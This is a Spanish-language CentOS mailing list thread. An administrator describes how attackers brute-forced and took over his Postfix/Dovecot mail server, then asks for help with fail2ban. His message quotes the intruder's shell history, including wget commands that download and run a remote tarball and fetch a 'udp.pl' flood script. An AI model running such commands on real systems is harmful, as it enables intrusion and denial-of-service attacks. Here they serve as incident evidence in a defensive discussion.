[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

tito25 en gmail.com tito25 en gmail.com
Lun Abr 15 11:29:17 UTC 2013 

Podías considerar que ese servidor ya esta tomado podrías y seguirían
haciéndolo mientras más seguridad le pongas más trabajo le daras pero
seguirán con lo mismo  creo q debes considerar darle de baja, y armar Otro
servidor en paralelo con otra ip publica pero con otra protección y
cerrando algunos puertos.
El abr 5, 2013 10:12 a.m., "Luis Alberto Roman Aguirre" <
luisroman80 en hotmail.com> escribió:

> Buenas amigos Listeros:
> Retomando el tema del servidor de correos, perdón por el retraso, y
>  agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch
> Canu,Jose Fernández Rodríguez,Francesc Guitart  ...a la LISTA en GENERAL
> ..y  si me olvide de alguien mil disculpas.
> Bueno, es comento que los días posteriores fue tanto el escaneo que al
> final tomaron posesión de mi servidor a través de un usuario el cual borre
> pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo
> esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este
> archivo:
>
>
>
>
>   wget
>   www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
>   tar -pxzf csservers_redirecte_linux_hlds.tar.gz
>   ps x
>   killall screen
>   ps x
>   free -m
>   screen
>   cd csservers_redirecte_linux_hlds
>   ./start
>   cd ..
>
>
>
>   #wget
>   http://y2khom3.evonet.ro/udp.pl
>   #wget
>   www.buble.biz/alinftp/udp.pl
>   #wget
>   www.packetstormsecurity.org/DoS/udp.pl
>   #ps x
>   #cd /tmp
>   #ls -a
>   #w
>
>
>
>
>
>
> Ahora les detallo que ingresaron por un usuario el cual hace reenvio de
> correos a nivel local el cual no tenia contraseña, en el nuevo servidor le
> puse contraseña a todos los usuarios y demas con
> caracteres(mayusculas,minusculas y  numeros). Lo que me sorprende fue aun
> despues de reinstalar el centos , creo ya que me agarraron de punto ,
> porque note que sigo siendo escaneado  por la misma lista antes de la
> reinstalacion les copio parte y  les adjunto en txt:dovecot: Authentication
> Failures:base: 1376
> Time(s)root: 52
> Time(s)postmaster
> rhost=190.210.136.21 : 32 Time(s)mlizana
> rhost=10.1.0.28 : 20 Time(s)aa
> rhost=113.162.161.245 : 18 Time(s)admin
> rhost=183.60.20.40 : 14 Time(s)mconde: 10
> Time(s)test
> rhost=183.60.20.40 : 10 Time(s)admin1
> rhost=183.60.20.40 : 8 Time(s)dedicated
> rhost=183.60.20.40 : 8 Time(s)html
> rhost=183.60.20.40 : 8 Time(s)user1
> rhost=183.60.20.40 : 8 Time(s)bdsistemas:
> 6 Time(s)
> La ip segun lo investigado es de China:
> http://whatismyipaddress.com/ip/183.60.20.40 y  salio esto:(ojo hay  otro
> router que salio mientras escribía es este http://201.77.5.191/ de
> Brazil)General IP
> InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet
> Guangdong Province NetworkOrganization:ChinaNet Guangdong Province
> NetworkServices:None detectedType:BroadbandAssignment:Static
> IPBlacklist:Geolocation InformationCountry:China
> State/Region:GuangdongCity:GuangzhouLatitude:23.1167  (23° 7′ 0.12″
> N)Longitude:113.25  (113° 15′ 0.00″ E)
>
> Por recomendación de los ya mencionados amigos instale el fail2ban pero
>  creo que no hace nada o  bien algo estoy  haciendo mal ,posteo
> configuracion:####Jail.conf[dovecot-pop3imap]enabled  = truefilter   =
> dovecot-pop3imapaction   = iptables-multiport[name=dovecot-pop3imap,
> port="pop3,pop3s,imap,imaps", protocol=tcp]
> sendmail-whois[name=dovecot-pop3imap, dest=root, sender=user en xxx.xxx]logpath
>  = /var/log/maillogmaxretry = 2#findtime = 600bantime  = 5200
> En la carpeta filter.d/dovecot-pop3imap.conf tengo
> esto:[Definition]failregex = dovecot: auth-worker\(default\):
> sql\(.*,<HOST>\): unknown user            dovecot: (pop3|imap)-login:
> Aborted login \(.*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login:
> Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot:
> auth\(default\): passdb\(.*,<HOST>\)\: Attempted login with password having
> illegal chars            dovecot: (pop3|imap)-login: Disconnected \(auth
> failed, .*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Aborted
> login: .*, \[<HOST>\]ignoreregex =
> La cosa que los escaneos que me hacen al dovecot  el fail2ban no tiene
> idea de ellos, algo estoy  haciendo mal?, estoy  por probar el OSSEC, pero
> si hay  otra herramienta o  bien algo mas que se pueda hacer, ya que ser
> victima de nuevo  y  lo peor que me baneen en la black list para una
> empresa que depende del correo es lo  peor que les puede suceder, hablo por
> la experiencia amigos.
>
> Gracias por la ayuda , por leer este mail, y  por soportarme amigos, desde
> ya muchas gracias por sus respuestas.PDT:prometo responder como me fue ,
> asi ayudar a alguien mas que pueda tener este problema
> Atte.
> Luis Roman
>
>
>
>
>
>
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org
> http://lists.centos.org/mailman/listinfo/centos-es
>
>

Más información sobre la lista de distribución CentOS-es